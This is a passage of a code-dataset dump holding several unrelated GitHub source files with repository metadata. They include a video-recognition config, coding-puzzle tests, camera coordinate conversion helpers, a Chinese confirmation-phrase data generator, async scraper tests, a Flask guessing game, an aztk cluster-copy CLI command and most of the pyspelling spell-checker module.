0, 1, 0), (0, 1, 0)),\n zero_init_residual=False),\n cls_head=dict(\n type='AEDebiasHead',\n num_classes=101,\n in_channels=2048,\n loss_cls=dict(\n type='EvidenceLoss',\n num_classes=101,\n evidence='exp',\n loss_type='log',\n with_kldiv=False,\n with_avuloss=False,\n annealing_method='exp',\n total_epochs=50,\n kldiv_weight=1.0,\n avuloss_weight=1.0,\n ),\n loss_recon=dict(\n type='WeightedLoss',\n loss_weight=1.0,\n loss_impl=\"l1\",\n evidence_type=\"exp\",\n num_class=101,\n sign=1.0,\n detach=True,\n per_batch_norm=True,\n recenter=True,\n weight_src=\"unc\",\n ),\n loss_uncnorm=dict(\n type='UncNormLoss',\n loss_weight=1.0,\n evidence_type='exp',\n num_class=101,\n k=1/8,\n sign=1,\n ),\n spatial_type='avg',\n dropout_ratio=0.5,\n init_std=0.01,\n freeze_cls=False,\n freeze_decoder=False,\n with_bn=True,\n recon_grad_rev=True,\n recon_grad_rev_alpha=0.2,\n heavy_cls_head=False,\n do_uncnorm=False,\n loss_debias=dict(type=\"CrossEntropyLoss\", loss_weight=1.0),\n num_scene_classes=365,\n scene_grad_rev_alpha=1.0,\n do_guide=False,\n loss_guide=dict(\n type=\"GuideLoss\",\n loss_weight=1.0,\n loss_impl=\"l1\",\n evidence_type=\"exp\",\n num_class=101,\n detach_unc=False,\n detach_scene=False,\n per_batch_norm=True,\n do_one_minus=True,\n ),\n ),\n recon_tgt='frame_raw',\n do_median_filter=True,\n median_win_size=15,\n # model training and testing settings\n train_cfg=dict(aux_info=['scene_feature', 'scene_pred'], _delete_=True),\n test_cfg=dict(average_clips='evidence', evidence_type='exp'))\n\n# runtime settings\nwork_dir = './work_dirs/i3d_weighed_ae_edl_dis/'\ncustom_hooks = [\n dict(type='AnnealEDLWeightHook', total_epochs=50),\n # dict(type='LinearAnnealGradRevAlphaHook', target=\"weight\")\n]\n","repo_name":"yhZhai/SOAR","sub_path":"configs/recognition/i3d/i3d_r50_dense_32x2x1_50e_ucf101_rgb_weighted_ae_edl_dis.py","file_name":"i3d_r50_dense_32x2x1_50e_ucf101_rgb_weighted_ae_edl_dis.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"37712247302","text":"from L0994_RottingOranges import f_gold\n\n##########\n# ++++++ to be replaced by tester ++++++\nmylog = print\nmyexactlog = print\n\"+++++++++++++++++\"\n\ndef test():\n \"--- test function ---\"\n param = [\n # example 1\n [[[2, 1, 1], [1, 1, 0], [0, 1, 1]]]\n # output: 4\n ,\n # example 2\n [[[2, 1, 1], [0, 1, 1], [1, 0, 1]]]\n # output: -1\n # EXPLANATION: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 4-directionally.\n ,\n # example 3\n [[[0, 2]]]\n # output: 0\n # EXPLANATION: Since there are already no fresh oranges at minute 0, the answer is just 0.\n ,\n ]\n for i, parameters_set in enumerate(param):\n idx = i\n mylog(0, idx)\n result = f_gold(* parameters_set)\n myexactlog(1, result)\n\n##########\n\ntest()\n","repo_name":"HALOCORE/DuoGlot","sub_path":"data/duoglot/tests/staleetcode/pysep/L0994_RottingOranges__test.py","file_name":"L0994_RottingOranges__test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"19485939867","text":"from typing import Final, Dict\nfrom camconv.typedef import *\nimport numpy as np\n\nk_ref_convention: Final[str] = \"LEFT_UP_FRONT\"\nk_ref_axes: Final[Dict[CubeFace, Tuple[float, float, float]]] = get_reference_axes(k_ref_convention)\n\n\ndef get_transform_to_ref(convention: str) -> np.ndarray:\n '''\n Get the 3x3 matrix mapping from the input convention to the \n reference one.\n '''\n x, y, z = split_axes_convention(convention)\n return np.column_stack((k_ref_axes[x], k_ref_axes[y], k_ref_axes[z]))\n\n\nk_camera_to_ref: Final[Dict[CoordinateSystem, np.ndarray]] = {\n CoordinateSystem.REFERENCE: get_transform_to_ref(k_ref_convention),\n CoordinateSystem.PYTORCH3D: get_transform_to_ref(\"LEFT_UP_FRONT\"),\n CoordinateSystem.COLMAP: get_transform_to_ref(\"RIGHT_DOWN_FRONT\"),\n CoordinateSystem.OPENCV: get_transform_to_ref(\"RIGHT_DOWN_FRONT\"),\n CoordinateSystem.OPENGL: get_transform_to_ref(\"RIGHT_UP_BACK\"),\n CoordinateSystem.NGP: get_transform_to_ref(\"RIGHT_UP_BACK\")\n}\n\nk_world_to_ref: Final[Dict[CoordinateSystem, np.ndarray]] = {\n CoordinateSystem.NGP: get_transform_to_ref(\"FRONT_LEFT_UP\")\n}\n\n\ndef convert_vertices(verts_in: np.ndarray, system_in: CoordinateSystem, system_out: CoordinateSystem) -> np.ndarray:\n '''\n Transform vertices (N x 3) between different coordinate systems\n '''\n t_ref_win = k_world_to_ref.get(system_in, k_camera_to_ref[system_in])\n t_ref_wout = k_world_to_ref.get(system_out, k_camera_to_ref[system_out])\n t_wout_ref = np.linalg.inv(t_ref_wout)\n\n verts_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, verts_in.T)).T\n return verts_out\n\ndef convert_pose(r_in: np.ndarray, t_in: np.ndarray, system_in: CoordinateSystem, system_out: CoordinateSystem) -> Tuple[np.ndarray, np.ndarray]:\n '''\n Convert pose from one coordinate system to another.\n '''\n t_ref_cin = k_camera_to_ref[system_in]\n t_ref_win = k_world_to_ref.get(system_in, t_ref_cin)\n t_cin_ref = np.linalg.inv(t_ref_cin)\n\n t_ref_cout = k_camera_to_ref[system_out]\n t_ref_wout = k_world_to_ref.get(system_out, t_ref_cout)\n t_wout_ref = np.linalg.inv(t_ref_wout)\n\n r_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, r_in, t_cin_ref, t_ref_cout))\n t_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, t_in))\n return r_out, t_out","repo_name":"ankarako/cam-conv","sub_path":"camconv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73837843470","text":"import json\nfrom random import *\nfrom weight_choice import *\n\nlabellist={'是':1,'否':2}\n\n#label = 1\n# head = ['', '我看看', '稍等我看看']\nstatus_ture = ['是', '是的','恩', '对', '恩对的','恩是的','恩是','啊是','啊是的','啊对','啊对的','没错','是这','是这个','就是这个','就是这儿']\nmodal_true = ['','','', '啊', '哦','呀']\n\n#label = 2\n# head = ['', '我看看', '稍等我看看']\nmodal_no = ['', '啊', '额']\nstatus_no = ['不是', '不是的','否','不是这个','不是这儿','不对']\nmodal_no_tail = ['', '','','啊','呀']\n# address_past = ['', '我申请表写的是户口本地址','我申请表写的是身份证地址','我申请表写的是老家地址','我填的是身份证地址','我填的是老家地址','我填的是户口本地址','我申请表填的是身份证地址','我申请表填的是老家地址','我申请表填的是户口本地址']\n\n#label = 2\n# head = ['', '我看看', '稍等我看看']\n# # madal_no = ['', '啊', '额']\n# status_false = ['','不是', '不是的']\n# address_now= ['', '我现在租房子住','我暂时不住那里了','我现在没住在那里','我过一段时间回去住','我改了','我换地方了','我有时候住那','我一段时间住那','我大部分时间不在那里住','我现在在外地打工','我在别的地方工作','我换工作了就不住那里了','我马上搬家了','我不住那里了','我现在不住那里了']\n# modal_false = ['','啊','呀']\n\nclass Confirm(object):\n def __init__(self):\n self.items_list = str()\n self.items_choice = str()\n\n def update(self, iterable):\n self.items_list = ''.join(iterable)\n return self.items_list\n\n def choosesingle(self, iterable):\n self.items_choice =''.join(choice(iterable))\n return self.items_choice\n\n def choose(self, iterable):\n for item in iterable:\n self.items_choice = self.items_choice + choice(item)\n return self.items_choice\n\n\ndef confirm_yes():\n confirm = Confirm()\n label = 1\n confirm_true = confirm.choose([status_ture,modal_true])\n return confirm_true,label\n\n# def confirm_false():\n# confirm = Confirm()\n# label = 2\n# confirm_no = confirm.choose([head,modal_no,status_false,address_now,modal_false])\n# return confirm_no,label\n\ndef confirm_no():\n confirm = Confirm()\n label = 2\n confirm_no = confirm.choose([modal_no,status_no,modal_no_tail])\n return confirm_no,label\n\n# print(confirm_yes())\n# print(confirm_no())\n# print(confirm_false())\ndef gen_confirm():\n confirm_list =[confirm_yes(), confirm_no()]\n confirm_ref, label_name = choice(confirm_list)\n return confirm_ref, label_name\n\n# print(len(address_past),len(address_now))\n\nif __name__ == \"__main__\":\n num_data = 1000\n list_data = list()\n label_name = 'confirm'\n for i in range(num_data):\n list_dict = dict()\n list_dict['label_name'] = label_name\n list_dict['id'] = i\n list_dict['ref'], list_dict['label'] = gen_confirm()\n list_data.append(list_dict)\n print('loading')\n # print(list_data)\n obj = json.dumps(list_data, ensure_ascii=False, indent=2)\n file = open('/home/yzs/gendata/'+label_name+'_gen_0605_'+str(num_data)+'.json', 'w')\n file.write(obj)\n file.close()","repo_name":"yanzhishuo/dataprocessing_dc","sub_path":"genconfirm/confirm_simple.py","file_name":"confirm_simple.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29241897367","text":"from typing import Optional, Tuple, Iterable\n\nimport pytest\n\nfrom aioscrapy.client import FakeClient, CrawlerClient\nfrom aioscrapy.worker import Dispatcher, SimpleWorker, CrawlerWorker, Master\n\n\nclass ReduceStringClient(CrawlerClient[str, str]):\n async def fetch(self, key: str) -> Optional[Tuple[Iterable[str], str]]:\n if key:\n return [key[:-1]], key\n return None\n\n\n@pytest.mark.asyncio\nasync def test_reduce_string_client():\n client = ReduceStringClient()\n assert await client.fetch('123') == (['12'], '123')\n assert await client.fetch('1') == ([''], '1')\n assert await client.fetch('') is None\n\n\ndef test_dispatcher():\n dispatcher = Dispatcher([])\n assert dispatcher.empty() is True\n key1, key2, key3, error_key = 'key1', 'key2', 'key3', 'error_key'\n\n dispatcher.add(key1)\n assert dispatcher.empty() is False\n\n key = dispatcher.get()\n assert key == key1\n dispatcher.ack(key)\n assert dispatcher.empty() is True\n\n dispatcher.add(key2)\n dispatcher.add(key3)\n\n keys = {dispatcher.get(), dispatcher.get()}\n assert keys == {key2, key3}\n assert dispatcher.empty() is False\n dispatcher.ack(error_key)\n dispatcher.ack(key2)\n assert dispatcher.empty() is False\n dispatcher.ack(key3)\n assert dispatcher.empty() is True\n\n\n@pytest.mark.asyncio\nasync def test_simple_worker():\n keys = ['key1', 'key2', 'key3']\n dispatcher = Dispatcher(keys)\n client = FakeClient()\n worker = SimpleWorker(dispatcher, client)\n result = await worker.run()\n assert result == {key: key for key in keys}\n\n\n@pytest.mark.asyncio\nasync def test_crawler_worker():\n keys = ['abc', 'asd']\n dispatcher = Dispatcher(keys)\n client = ReduceStringClient()\n worker = CrawlerWorker(dispatcher, client)\n result = await worker.run()\n assert result == {\n 'a': 'a',\n 'ab': 'ab',\n 'abc': 'abc',\n 'as': 'as',\n 'asd': 'asd',\n }\n\n\nasync def test_master():\n keys = ['key1', 'key2', 'key3']\n dispatcher = Dispatcher(keys)\n client = FakeClient()\n worker1 = SimpleWorker(dispatcher, client)\n worker2 = SimpleWorker(dispatcher, client)\n master = Master((worker1, worker2))\n result = await master.run()\n assert result == {key: key for key in keys}\n","repo_name":"aleksender/aioscrapy","sub_path":"tests/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"3084875451","text":"import os\r\nfrom typing import (\r\n Final\r\n)\r\nfrom flask import (\r\n Flask,\r\n render_template,\r\n session,\r\n request,\r\n redirect,\r\n url_for,\r\n)\r\nfrom scripts.utils import (\r\n IMAGE_PATH,\r\n get_dependencies,\r\n get_predicted_label,\r\n generate_options,\r\n)\r\nimport cv2\r\nimport random\r\n\r\n\r\n# Constants\r\nPORT_NUMBER: Final = 5000\r\nWIDTH_HEIGHT: Final = 300\r\n\r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"secret-key\"\r\n\r\n\r\ndef init_session():\r\n \"\"\"\r\n Initializes the session variables. It sets the score to 0, the count to 0 \r\n and shuffles and resizing the files.\r\n @effects: Modifies the `session`.\r\n \"\"\"\r\n # The user accessed the play page directly\r\n if \"initialized\" not in session:\r\n return\r\n\r\n # The session has already been initialized\r\n if session[\"initialized\"]:\r\n return\r\n\r\n session[\"score\"] = 0\r\n session[\"count\"] = 0\r\n\r\n session[\"files\"] = os.listdir(IMAGE_PATH)\r\n random.shuffle(session[\"files\"])\r\n\r\n # Resize all the images to 300x300 if they aren't already\r\n for filename in session[\"files\"]:\r\n img = cv2.imread(f\"{IMAGE_PATH}/{filename}\", cv2.IMREAD_UNCHANGED)\r\n height, width, _ = img.shape\r\n if height == width == WIDTH_HEIGHT:\r\n continue\r\n img = cv2.resize(img, (WIDTH_HEIGHT, WIDTH_HEIGHT))\r\n cv2.imwrite(f\"{IMAGE_PATH}/{filename}\", img)\r\n \r\n session[\"initialized\"] = True\r\n\r\n\r\ndef get_file() -> str:\r\n \"\"\"\r\n Gets the next file in the list of files.\r\n \"\"\"\r\n files = session[\"files\"]\r\n return files[session[\"count\"] % len(files)]\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n session[\"initialized\"] = False\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/play\", methods=[\"GET\", \"POST\"])\r\ndef play():\r\n # User accessed the page directly without going through the main page\r\n if \"initialized\" not in session:\r\n return redirect(url_for(\"index\"))\r\n if request.method == \"POST\":\r\n option = request.form[\"option\"]\r\n predicted_label = session[\"predicted_label\"]\r\n\r\n if option == predicted_label:\r\n session[\"score\"] += 1\r\n\r\n session[\"count\"] += 1\r\n\r\n session[\"current_score\"] = session[\"score\"]\r\n session[\"current_count\"] = session[\"count\"]\r\n\r\n return render_template(\r\n \"result.html\",\r\n predicted_label=predicted_label,\r\n option=option,\r\n score=session[\"score\"],\r\n count=session[\"count\"],\r\n num_files=len(session[\"files\"]),\r\n )\r\n elif \"count\" in session and session[\"count\"] >= len(session[\"files\"]):\r\n return redirect(url_for(\"done\"))\r\n\r\n # User navigated to the page so we want to display the image and options\r\n else:\r\n init_session()\r\n \r\n label_dict, best_model = get_dependencies()\r\n filename = get_file()\r\n predicted_label = get_predicted_label(filename, best_model, label_dict)\r\n session[\"predicted_label\"] = predicted_label\r\n\r\n return render_template(\r\n \"options.html\",\r\n options=generate_options(predicted_label, label_dict),\r\n image_path=f\"{IMAGE_PATH}/{filename}\"\r\n )\r\n\r\n\r\n@app.route(\"/done\")\r\ndef done():\r\n # User accessed the page directly without playing the game\r\n if \"initialized\" not in session or \"current_score\" not in session \\\r\n or \"current_count\" not in session:\r\n return redirect(url_for(\"index\"))\r\n \r\n score = session[\"current_score\"]\r\n count = session[\"current_count\"]\r\n session[\"initialized\"] = False\r\n init_session()\r\n\r\n return render_template(\r\n \"done.html\",\r\n score=score,\r\n count=count,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=PORT_NUMBER)\r\n","repo_name":"christopherlam888/produce-palate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22060942456","text":"import argparse\nimport sys\nimport typing\n\nimport aztk.spark\nfrom aztk_cli import config, utils\n\n\ndef setup_parser(parser: argparse.ArgumentParser):\n parser.add_argument(\"--id\", dest=\"cluster_id\", required=True, help=\"The unique id of your spark cluster\")\n\n parser.add_argument(\"--source-path\", required=True, help=\"the local file you wish to copy to the cluster\")\n\n parser.add_argument(\n \"--dest-path\",\n required=True,\n help=\"the path the file will be copied to on each node in the cluster.\"\n \"Note that this must include the file name.\",\n )\n parser.add_argument(\n \"--internal\",\n action=\"store_true\",\n help=\"Connect using the local IP of the master node. Only use if using a VPN.\",\n )\n parser.set_defaults(internal=False)\n\n\ndef execute(args: typing.NamedTuple):\n spark_client = aztk.spark.Client(config.load_aztk_secrets())\n with utils.Spinner():\n copy_output = spark_client.cluster.copy(\n id=args.cluster_id, source_path=args.source_path, destination_path=args.dest_path, internal=args.internal)\n for node_output in copy_output:\n utils.log_node_copy_output(node_output)\n sys.exit(0 if not any([node_output.error for node_output in copy_output]) else 1)\n","repo_name":"Azure/aztk","sub_path":"aztk_cli/spark/endpoints/cluster/cluster_copy.py","file_name":"cluster_copy.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"83"} +{"seq_id":"26754422011","text":"\"\"\"Spell check with Aspell or Hunspell.\"\"\"\nimport os\nimport importlib\nfrom . import util\nfrom .__meta__ import __version__, __version_info__ # noqa: F401\nfrom . import flow_control\nfrom . import filters\nfrom wcmatch import glob\nimport codecs\nfrom collections import namedtuple\n\n__all__ = (\"spellcheck\",)\n\nSTEP_ERROR = \"\"\"Pipeline step in unexpected format: {}\n\nEach pipeline step should be in the form {{key: options: {{}}}} not {{key: {{}}, key2: {{}}}}\n\"\"\"\n\n\nclass Results(namedtuple('Results', ['words', 'context', 'category', 'error'])):\n \"\"\"Results.\"\"\"\n\n def __new__(cls, words, context, category, error=None):\n \"\"\"Allow defaults.\"\"\"\n\n return super().__new__(cls, words, context, category, error)\n\n\nclass SpellChecker:\n \"\"\"Spell check class.\"\"\"\n\n DICTIONARY = 'dictionary.dic'\n\n GLOB_FLAG_MAP = {\n \"CASE\": glob.C,\n \"C\": glob.C,\n \"IGNORECASE\": glob.I,\n \"I\": glob.I,\n \"RAWCHARS\": glob.R,\n \"R\": glob.R,\n \"NEGATE\": glob.N,\n \"N\": glob.N,\n \"MINUSNEGATE\": glob.M,\n \"M\": glob.M,\n \"GLOBSTAR\": glob.G,\n \"G\": glob.G,\n \"DOTGLOB\": glob.D,\n \"D\": glob.D,\n \"EXTGLOB\": glob.E,\n \"E\": glob.E,\n \"BRACE\": glob.B,\n \"B\": glob.B,\n \"FOLLOW\": glob.L,\n \"L\": glob.L,\n \"MATCHBASE\": glob.X,\n \"X\": glob.X,\n \"NEGATEALL\": glob.A,\n \"A\": glob.A,\n \"NOUNIQUE\": glob.Q,\n \"Q\": glob.Q,\n \"GLOBTILDE\": glob.T,\n \"T\": glob.T,\n # We will accept these, but we already force them on\n \"SPLIT\": glob.S,\n \"S\": glob.S,\n \"NODIR\": glob.O,\n \"O\": glob.O\n }\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n # General options\n self.binary = binary if binary else 'aspell'\n self.verbose = verbose\n self.dict_bin = os.path.abspath(self.DICTIONARY)\n self.debug = debug\n self.default_encoding = ''\n\n def log(self, text, level):\n \"\"\"Log level.\"\"\"\n if self.verbose >= level:\n print(text)\n\n def get_error(self, e):\n \"\"\"Get the error.\"\"\"\n\n import traceback\n\n return traceback.format_exc() if self.debug else str(e)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n \"\"\"Setup the command.\"\"\"\n\n return []\n\n def _pipeline_step(self, sources, options, personal_dict, filter_index=1, flow_status=flow_control.ALLOW):\n \"\"\"Recursively run text objects through the pipeline steps.\"\"\"\n\n for source in sources:\n if source._has_error():\n yield source\n elif not source._is_bytes() and filter_index < len(self.pipeline_steps):\n f = self.pipeline_steps[filter_index]\n if isinstance(f, flow_control.FlowControl):\n err = ''\n try:\n status = f._run(source.category)\n except Exception as e:\n err = self.get_error(e)\n yield filters.SourceText('', source.context, '', '', err)\n if not err:\n if filter_index < len(self.pipeline_steps):\n yield from self._pipeline_step(\n [source], options, personal_dict, filter_index + 1, status\n )\n else:\n if flow_status == flow_control.ALLOW:\n err = ''\n try:\n srcs = f._run(source)\n except Exception as e:\n err = self.get_error(e)\n yield filters.SourceText('', source.context, '', '', err)\n if not err:\n yield from self._pipeline_step(\n srcs, options, personal_dict, filter_index + 1\n )\n elif flow_status == flow_control.SKIP:\n yield from self._pipeline_step(\n [source], options, personal_dict, filter_index + 1\n )\n else:\n # Halted tasks\n yield source\n else:\n # Binary content\n yield source\n\n def _spelling_pipeline(self, sources, options, personal_dict):\n \"\"\"Check spelling pipeline.\"\"\"\n\n for source in self._pipeline_step(sources, options, personal_dict):\n # Don't waste time on empty strings\n if source._has_error():\n yield Results([], source.context, source.category, source.error)\n elif not source.text or source.text.isspace():\n continue\n else:\n encoding = source.encoding\n if source._is_bytes():\n text = source.text\n else:\n # UTF-16 and UTF-32 don't work well with Aspell and Hunspell,\n # so encode with the compatible UTF-8 instead.\n if encoding.startswith(('utf-16', 'utf-32')):\n encoding = 'utf-8'\n text = source.text.encode(encoding)\n self.log('', 3)\n self.log(text, 3)\n cmd = self.setup_command(encoding, options, personal_dict)\n self.log(\"Command: \" + str(cmd), 4)\n\n try:\n wordlist = util.call_spellchecker(cmd, input_text=text, encoding=encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n def compile_dictionary(self, lang, wordlists, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n def _walk_src(self, targets, flags, limit, pipeline, expect_match):\n \"\"\"Walk source and parse files.\"\"\"\n\n found_something = False\n for target in targets:\n # Glob using `S` for patterns with `|` and `O` to exclude directories.\n kwargs = {\"flags\": flags | glob.S | glob.O}\n kwargs['limit'] = limit\n for f in glob.iglob(target, **kwargs):\n found_something = True\n self.log('', 2)\n self.log('> Processing: %s' % f, 1)\n if pipeline:\n try:\n yield pipeline[0]._run_first(f)\n except Exception as e:\n err = self.get_error(e)\n yield [filters.SourceText('', f, '', '', err)]\n else:\n try:\n if self.default_encoding:\n encoding = filters.PYTHON_ENCODING_NAMES.get(\n self.default_encoding, self.default_encoding\n ).lower()\n encoding = codecs.lookup(encoding).name\n else:\n encoding = self.default_encoding\n yield [filters.SourceText('', f, encoding, 'file')]\n except Exception as e:\n err = self.get_error(e)\n yield [filters.SourceText('', f, '', '', err)]\n if not found_something and expect_match:\n raise RuntimeError(\n 'None of the source targets from the configuration match any files:\\n{}'.format(\n '\\n'.join(f'- {target}' for target in targets)\n )\n )\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return {}\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n return None\n\n def _build_pipeline(self, task):\n \"\"\"Build up the pipeline.\"\"\"\n\n self.pipeline_steps = []\n kwargs = {}\n if self.default_encoding:\n kwargs[\"default_encoding\"] = self.default_encoding\n\n steps = task.get('pipeline', [])\n if steps is None:\n self.pipeline_steps = None\n else:\n if not steps:\n steps = task.get('filters', [])\n if steps:\n util.warn_deprecated(\n \"'filters' key in config is deprecated. 'pipeline' should be used going forward.\"\n )\n\n if not steps:\n steps.append('pyspelling.filters.text')\n\n for step in steps:\n # Retrieve module and module options\n if isinstance(step, dict):\n if len(step) > 1:\n raise ValueError(STEP_ERROR.format(str(step)))\n name, options = next(iter(step.items()))\n else:\n name = step\n options = {}\n if options is None:\n options = {}\n\n module = self._get_module(name)\n if issubclass(module, filters.Filter):\n self.pipeline_steps.append(module(options, **kwargs))\n elif issubclass(module, flow_control.FlowControl):\n if self.pipeline_steps:\n self.pipeline_steps.append(module(options))\n else:\n raise ValueError(\"Pipeline cannot start with a 'Flow Control' plugin!\")\n else:\n raise ValueError(\"'%s' is not a valid plugin!\" % name)\n\n def _get_module(self, module):\n \"\"\"Get module.\"\"\"\n\n if isinstance(module, str):\n mod = importlib.import_module(module)\n for name in ('get_plugin', 'get_filter'):\n attr = getattr(mod, name, None)\n if attr is not None:\n break\n if name == 'get_filter':\n util.warn_deprecated(\"'get_filter' is deprecated. Plugins should use 'get_plugin'.\")\n if not attr:\n raise ValueError(\"Could not find the 'get_plugin' function in module '%s'!\" % module)\n return attr()\n\n def _to_flags(self, text):\n \"\"\"Convert text representation of flags to actual flags.\"\"\"\n\n flags = 0\n for x in text.split('|'):\n value = x.strip().upper()\n if value:\n flags |= self.GLOB_FLAG_MAP.get(value, 0)\n return flags\n\n def run_task(self, task, source_patterns=None):\n \"\"\"Walk source and initiate spell check.\"\"\"\n\n # Perform spell check\n self.log('Running Task: %s...' % task.get('name', ''), 1)\n\n # Setup filters and variables for the spell check\n self.default_encoding = task.get('default_encoding', '')\n options = self.setup_spellchecker(task)\n personal_dict = self.setup_dictionary(task)\n glob_flags = self._to_flags(task.get('glob_flags', \"N|B|G\"))\n glob_limit = task.get('glob_pattern_limit', 1000)\n self._build_pipeline(task)\n\n if not source_patterns:\n source_patterns = task.get('sources', [])\n\n expect_match = task.get('expect_match', True)\n for sources in self._walk_src(source_patterns, glob_flags, glob_limit, self.pipeline_steps, expect_match):\n if self.pipeline_steps is not None:\n yield from self._spelling_pipeline(sources, options, personal_dict)\n else:\n yield from self.spell_check_no_pipeline(sources, options, personal_dict)\n\n\nclass Aspell(SpellChecker):\n \"\"\"Aspell spell check class.\"\"\"\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(config, binary, verbose, debug)\n self.binary = binary if binary else 'aspell'\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return task.get('aspell', {})\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n dictionary_options = task.get('dictionary', {})\n output = os.path.abspath(dictionary_options.get('output', self.dict_bin))\n aspell_options = task.get('aspell', {})\n lang = aspell_options.get('lang', aspell_options.get('l', 'en'))\n wordlists = dictionary_options.get('wordlists', [])\n if lang and wordlists:\n self.compile_dictionary(\n lang,\n dictionary_options.get('wordlists', []),\n dictionary_options.get('encoding', 'utf-8'),\n output\n )\n else:\n output = None\n return output\n\n def compile_dictionary(self, lang, wordlists, encoding, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n cmd = [\n self.binary,\n '--lang', lang,\n '--encoding', codecs.lookup(filters.PYTHON_ENCODING_NAMES.get(encoding, encoding).lower()).name,\n 'create',\n 'master', output\n ]\n\n wordlist = ''\n\n try:\n output_location = os.path.dirname(output)\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n if os.path.exists(output):\n os.remove(output)\n\n self.log(\"Compiling Dictionary...\", 1)\n # Read word lists and create a unique set of words\n words = set()\n for wordlist in wordlists:\n with open(wordlist, 'rb') as src:\n for word in src.read().split(b'\\n'):\n words.add(word.replace(b'\\r', b''))\n\n # Compile wordlist against language\n util.call(\n cmd,\n input_text=b'\\n'.join(sorted(words)) + b'\\n'\n )\n except Exception:\n self.log(cmd, 0)\n self.log(\"Current wordlist: '%s'\" % wordlist, 0)\n self.log(\"Problem compiling dictionary. Check the binary path and options.\", 0)\n raise\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n for source in sources:\n\n if source._has_error(): # pragma: no cover\n yield Results([], source.context, source.category, source.error)\n\n try:\n with open(source.context, 'rb') as f:\n content = f.read()\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n # Don't waste time on empty string\n if not content or content.isspace():\n continue\n\n self.log('', 3)\n self.log(content, 3)\n\n cmd = self.setup_command(source.encoding, options, personal_dict, source.context)\n self.log(\"Command: \" + str(cmd), 4)\n try:\n wordlist = util.call_spellchecker(cmd, input_text=content, encoding=source.encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n \"\"\"Setup the command.\"\"\"\n\n cmd = [\n self.binary,\n 'list'\n ]\n\n if encoding:\n cmd.extend(['--encoding', encoding])\n\n if personal_dict:\n cmd.extend(['--add-extra-dicts', personal_dict])\n\n disallowed = {\n '?', 'a', 'c', 'v', 'ignore-repl', 'dont-ignore-repl', 'keyboard', 'prefix', 'repl', 'save-repl',\n 'dont-save-repl', 'set-prefix', 'dont-set-prefix', 'size', 'sug-mode', 'sug-typo-analysis',\n 'dont-sug-typo-analysis', 'sug-repl-table', 'dont-sug-repl-table', 'rem-sug-split-char',\n 'add-sug-split-char', 'warn', 'affix-compress', 'dont-affix-compress', 'clean-affixes',\n 'dont-clean-affixes', 'invisible-soundslike', 'dont-invisible-soundslike', 'partially-expand',\n 'dont-partially-expand', 'skip-invalid-words', 'dont-skip-invalid-words', 'validate-affixes',\n 'dont-validate-affixes', 'validate-words', 'dont-validate-words', 'b', 'x', 'backup', 'dont-backup',\n 'byte-offsets', 'dont-byte-offsets', 'm', 'P', 'guess', 'dont-guess', 'keymapping', 'reverse',\n 'dont-reverse', 'suggest', 'dont-suggest', 'time', 'dont-time'\n\n }\n\n if 'mode' not in options:\n options['mode'] = 'none'\n\n for k, v in options.items():\n if k not in disallowed:\n key = ('-%s' if len(k) == 1 else '--%s') % k\n if isinstance(v, bool) and v is True:\n cmd.append(key)\n elif isinstance(v, str):\n cmd.extend([key, v])\n elif isinstance(v, int):\n cmd.extend([key, str(v)])\n elif isinstance(v, list):\n for value in v:\n cmd.extend([key, str(value)])\n\n if file_name is not None:\n cmd.append(file_name)\n\n return cmd\n\n\nclass Hunspell(SpellChecker):\n \"\"\"Hunspell spell check class.\"\"\"\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(config, binary, verbose, debug)\n self.binary = binary if 